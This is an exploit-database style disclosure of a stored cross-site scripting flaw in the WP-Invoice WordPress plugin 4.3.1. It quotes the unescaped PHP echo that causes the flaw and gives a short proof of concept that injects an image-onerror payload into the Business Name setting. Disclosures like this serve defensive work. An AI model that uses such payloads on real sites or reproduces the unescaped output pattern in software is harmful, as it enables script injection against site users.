# Exploit Title: WordPress Plugin WP-Invoice - Stored Cross Site Scripting
# Date: 25-04-2022
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/WP-Invoice/
# Version: 4.3.1
# Tested on: Firefox
# Contact me: mariamtariq404@gmail.com
# Vulnerable Code:
```
wpi.business_name = '<?php echo ($wpi_settings['business_name']); ?>';
``
# POC
1. Install the WP-Invoice WordPress plugin and activate it.
2. Go to WP-Invoice settings and inside the Business Name field inject XSS
payload “><img src=x onerror=alert(1)>
3. XSS will trigger and will be stored.
## POC Image
https://imgur.com/rsHIEO9